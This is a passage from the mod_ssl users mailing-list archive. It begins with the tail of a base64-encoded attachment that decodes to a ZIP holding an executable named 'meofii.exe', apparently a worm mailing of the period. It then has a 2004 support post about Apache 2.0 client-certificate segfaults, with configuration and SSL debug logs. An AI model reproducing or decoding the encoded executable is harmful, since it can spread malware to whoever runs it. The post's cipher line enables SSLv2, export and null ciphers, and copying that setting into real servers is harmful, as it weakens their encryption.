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
aS5leGVQSwUGAAAAAAEAAQA4AAAAi1MAAAAA

----------bexldytbsifgicvriajg--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar  5 08:12:34 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id CCD9FA8A57; Fri,  5 Mar 2004 08:12:33 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.tcmb.gov.tr (mail.tcmb.gov.tr [213.139.239.100])
	by master.modssl.org (Postfix) with ESMTP id CB9C7A8943
	for ; Fri,  5 Mar 2004 08:12:19 +0100 (CET)
Received: (qmail 14351 invoked by uid 0); 5 Mar 2004 07:12:10 -0000
Received: from Mahmut.Eren@tcmb.gov.tr by idmsmail2.tcmb.gov.tr with virus-scanner(Clean); 05 Mar 2004 07:12:10 -0000
Received: from idmsmail1.tcmb.gov.tr ([10.5.0.212]) (envelope-sender )
          by idmsmail2.tcmb.gov.tr (qmail-ldap-1.03) with SMTP
          for ; 5 Mar 2004 07:12:07 -0000
Received: by idmsmail1.tcmb.gov.tr with Internet Mail Service (5.5.2653.19)
	id ; Fri, 5 Mar 2004 09:12:07 +0200
Message-ID: <00BAC1E9C896D411A46100508B137C3C0C770671@idmsmail1.tcmb.gov.tr>
From: Mahmut Eren 
To: modssl-users@modssl.org
Subject: problem with SSLVerifyClient required in apache 2.0
Date: Fri, 5 Mar 2004 09:12:00 +0200 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="ISO-8859-9"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mahmut Eren 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,
My system configuration is as follows:
Mandrake 9.2
Apache 2.0.47 
apache2-mod_ssl 2.0.47 
OpenSSL 0.9.7b 

I want to authenticate my clients with certificates. Here is apache-ssl configuration:
DocumentRoot "/var/www/html"
ErrorLog logs/ssl_error_log

TransferLog logs/ssl_access_log

SSLEngine on
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
SSLCertificateFile /etc/ssl/apache/download_sapslnt2.tcmb.gov.tr.crt
SSLCertificateKeyFile /etc/ssl/apache/server_openca91.key
SSLCertificateChainFile /etc/ssl/apache/cacert.pem
SSLCACertificateFile /etc/ssl/apache/cacert.pem
SSLCARevocationFile /etc/ssl/apache/cacrl.crl
SSLVerifyClient require
SSLVerifyDepth 1

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


    SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown \
    downgrade-1.0 force-response-1.0


CustomLog logs/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"


RewriteEngine On
RewriteOptions inherit


If I turn off the SSLVerifyClient parameter everything works fine. But 
when I turn on SSLVerifyClient as "SSLVerifyClient require" , the client (IE,mozilla) can not connect to server.
and apache logs the following for every attempt: 
   [Wed Mar 03 12:57:37 2004] [notice] child pid 22462 exit signal Segmentation fault (11)
I made the log level debug and get the following lines in ssl-error log file. Any help will be appreciated. 

thanks
Mahmut Eren

btw: it works in apache 1.3.23 with the same client certificate.

ssl-error log
______________
[Wed Mar 03 13:06:18 2004] [info] Connection to child 0 established (server sapslnt2.tcmb.gov.tr:443, client 10.5.54.91)
[Wed Mar 03 13:06:18 2004] [info] Seeding PRNG with 136 bytes of entropy
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1766): OpenSSL: Handshake: start
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: before/accept initialization
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 11/11 bytes from BIO#82e1738 [mem: 82d2530] (BIO dump follows)
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0000: 80 4c 01 03 00 00 33 00-00 00 10                 .L....3....      |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 67/67 bytes from BIO#82e1738 [mem: 82d253b] (BIO dump follows)
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0000: 00 00 04 00 00 05 00 00-0a 01 00 80 07 00 c0 03  ................ |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0010: 00 80 00 00 09 06 00 40-00 00 64 00 00 62 00 00  .......@..d..b.. |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0020: 03 00 00 06 02 00 80 04-00 80 00 00 13 00 00 12  ................ |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0030: 00 00 63 d2 6c 7d f0 59-be 40 5e fa a3 76 c0 10  ..c.l}.Y.@^..v.. |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1456): | 0040: 12 09 02                                         ...              |
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 read client hello A
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write server hello A
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write certificate A
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write certificate request A
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 flush data
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_io.c(1495): OpenSSL: I/O error, 5 bytes expected to read on BIO#82e1738 [mem: 82d2530]
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1803): OpenSSL: Exit: error in SSLv3 read client certificate A
[Wed Mar 03 13:06:18 2004] [debug] ssl_engine_kernel.c(1803): OpenSSL: Exit: error in SSLv3 read client certificate A
[Wed Mar 03 13:06:18 2004] [info] (70014)End of file found: SSL handshake interrupted by system [Hint: Stop button pressed in browser?!]
[Wed Mar 03 13:06:18 2004] [info] Connection to child 0 closed with abortive shutdown(server sapslnt2.tcmb.gov.tr:443, client 10.5.54.91)
[Wed Mar 03 13:06:20 2004] [info] Connection to child 6 established (server sapslnt2.tcmb.gov.tr:443, client 10.5.54.91)
[Wed Mar 03 13:06:20 2004] [info] Seeding PRNG with 136 bytes of entropy
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1766): OpenSSL: Handshake: start
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: before/accept initialization
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 11/11 bytes from BIO#82caf80 [mem: 82d2610] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 80 4c 01 03 00 00 33 00-00 00 10                 .L....3....      |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 67/67 bytes from BIO#82caf80 [mem: 82d261b] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 00 00 04 00 00 05 00 00-0a 01 00 80 07 00 c0 03  ................ |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0010: 00 80 00 00 09 06 00 40-00 00 64 00 00 62 00 00  .......@..d..b.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0020: 03 00 00 06 02 00 80 04-00 80 00 00 13 00 00 12  ................ |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0030: 00 00 63 38 ab 18 16 8f-3b b4 c2 c1 8f a1 9a cd  ..c8....;....... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0040: d3 54 ac                                         .T.              |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 read client hello A
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write server hello A
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write certificate A
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 write certificate request A
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_kernel.c(1774): OpenSSL: Loop: SSLv3 flush data
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 5/5 bytes from BIO#82caf80 [mem: 82d2610] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 16 03 00 06 09                                   .....            |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1462): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1484): OpenSSL: read 1455/1545 bytes from BIO#82caf80 [mem: 82d2615] (BIO dump follows)
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1431): +-------------------------------------------------------------------------+
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0000: 0b 00 04 fb 00 04 f8 00-04 f5 30 82 04 f1 30 82  ..........0...0. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0010: 03 d9 a0 03 02 01 02 02-01 08 30 0d 06 09 2a 86  ..........0...*. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0020: 48 86 f7 0d 01 01 05 05-00 30 63 31 0b 30 09 06  H........0c1.0.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0030: 03 55 04 06 13 02 54 52-31 0d 30 0b 06 03 55 04  .U....TR1.0...U. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0040: 0a 13 04 54 63 6d 62 31-0d 30 0b 06 03 55 04 0b  ...Tcmb1.0...U.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0050: 13 04 53 61 70 6d 31 10-30 0e 06 03 55 04 03 13  ..Sapm1.0...U... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0060: 07 42 49 47 4d 20 43 41-31 24 30 22 06 09 2a 86  .BIGM CA1$0"..*. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0070: 48 86 f7 0d 01 09 01 16-15 77 65 62 6d 61 73 74  H........webmast |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0080: 65 72 40 74 63 6d 62 2e-67 6f 76 2e 74 72 30 1e  er@tcmb.gov.tr0. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0090: 17 0d 30 34 30 33 30 31-31 35 33 38 30 31 5a 17  ..040301153801Z. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00a0: 0d 30 35 30 33 30 31 31-35 33 38 30 31 5a 30 5e  .050301153801Z0^ |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00b0: 31 0b 30 09 06 03 55 04-06 13 02 74 72 31 0d 30  1.0...U....tr1.0 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00c0: 0b 06 03 55 04 0a 13 04-74 63 6d 62 31 11 30 0f  ...U....tcmb1.0. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00d0: 06 03 55 04 0b 13 08 49-6e 74 65 72 6e 65 74 31  ..U....Internet1 |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00e0: 21 30 1f 06 03 55 04 03-13 18 4d 61 68 6d 75 74  !0...U....Mahmut |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 00f0: 20 45 52 45 4e 20 28 43-41 20 30 39 31 29 53 53   EREN (CA 091)SS |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0100: 4b 47 31 0a 30 08 06 03-55 04 05 13 01 38 30 81  KG1.0...U....80. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0110: 9f 30 0d 06 09 2a 86 48-86 f7 0d 01 01 01 05 00  .0...*.H........ |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0120: 03 81 8d 00 30 81 89 02-81 81 00 b0 10 dc 32 db  ....0.........2. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0130: f4 16 6e 52 6e 2f 65 a0-96 81 f2 eb cb f4 1c a2  ..nRn/e......... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0140: 5d 3b 0f 86 ed 26 fa 46-02 e6 97 50 ab 58 15 67  ];...&.F...P.X.g |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0150: 9e c8 ab ed b0 b3 6a 2a-86 8e 45 15 4b 0f f0 10  ......j*..E.K... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0160: 46 ea 51 32 f4 ab f4 48-b3 39 b5 a8 2c 0b 7a f1  F.Q2...H.9..,.z. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0170: 30 4d 86 5b 03 5e 9d e2-ed f5 e9 26 ec 37 ba 7e  0M.[.^.....&.7.~ |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0180: 95 8b a4 9f 15 7f 64 11-48 ee ca e9 a8 43 aa 4e  ......d.H....C.N |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0190: 88 b7 95 e3 8f 5d fa 3d-91 79 2e 4b 43 14 a3 29  .....].=.y.KC..) |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01a0: 8b 57 c2 fd 02 37 f6 f8-01 fe 8d 02 03 01 00 01  .W...7.......... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01b0: a3 82 02 37 30 82 02 33-30 09 06 03 55 1d 13 04  ...70..30...U... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01c0: 02 30 00 30 11 06 09 60-86 48 01 86 f8 42 01 01  .0.0...`.H...B.. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01d0: 04 04 03 02 05 a0 30 0b-06 03 55 1d 0f 04 04 03  ......0...U..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01e0: 02 05 e0 30 29 06 03 55-1d 25 04 22 30 20 06 08  ...0)..U.%."0 .. |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 01f0: 2b 06 01 05 05 07 03 02-06 08 2b 06 01 05 05 07  +.........+..... |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0200: 03 04 06 0a 2b 06 01 04-01 82 37 14 02 02 30 27  ....+.....7...0' |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0210: 06 09 60 86 48 01 86 f8-42 01 0d 04 1a 16 18 55  ..`.H...B......U |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0220: 73 65 72 20 43 65 72 74-69 66 69 63 61 74 65 20  ser Certificate  |
[Wed Mar 03 13:06:20 2004] [debug] ssl_engine_io.c(1456): | 0230: 6f 66 20 74 63 6d 62 30-1d 06 03 55 1d 0e 04 16  of tcmb0...U.... |
